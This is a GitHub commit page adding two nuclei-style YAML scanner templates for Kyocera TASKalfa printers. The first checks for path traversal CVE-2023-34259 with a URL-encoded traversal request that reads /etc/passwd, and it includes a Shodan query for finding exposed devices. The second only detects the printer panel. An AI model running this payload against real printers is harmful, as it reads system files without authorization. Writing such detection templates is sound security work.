-
Notifications
You must be signed in to change notification settings - Fork 2.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #8337 from gy741/rule-add-v149
Create CVE-2023-34259
- Loading branch information
Showing
2 changed files
with
74 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,45 @@ | ||
id: CVE-2023-34259 | ||
|
||
info: | ||
name: Kyocera TASKalfa printer - Path Traversal | ||
author: gy741 | ||
severity: high | ||
description: | | ||
CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings. | ||
remediation: | | ||
Upgrade to the latest version to mitigate this vulnerability. | ||
reference: | ||
- https://sec-consult.com/vulnerability-lab/advisory/path-traversal-bypass-denial-of-service-in-kyocera-printer/ | ||
- https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2023-07-14.html | ||
- https://packetstormsecurity.com/files/173397/Kyocera-TASKalfa-4053ci-2VG_S000.002.561-Path-Traversal-Denial-Of-Service.html | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2023-34259 | ||
cwe-id: CWE-22 | ||
metadata: | ||
max-request: 1 | ||
shodan-query: http.favicon.hash:-50306417 | ||
verified: true | ||
tags: cve,cve2023,kyocera,lfi,printer | ||
|
||
http: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
part: body | ||
regex: | ||
- "root:.*:0:0" | ||
|
||
- type: word | ||
part: server | ||
words: | ||
- "KM-MFP" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
id: kyocera-printer-panel | ||
|
||
info: | ||
name: Kyocera Printer Panel - Detect | ||
author: gy741 | ||
severity: info | ||
description: | | ||
Kyocera printer panel was detected. | ||
metadata: | ||
verified: true | ||
max-request: 1 | ||
shodan-query: http.favicon.hash:-50306417 | ||
tags: iot,panel,kyocera,printer | ||
|
||
http: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- '/startwlm/Start_Wlm.htm' | ||
|
||
- type: status | ||
status: | ||
- 200 |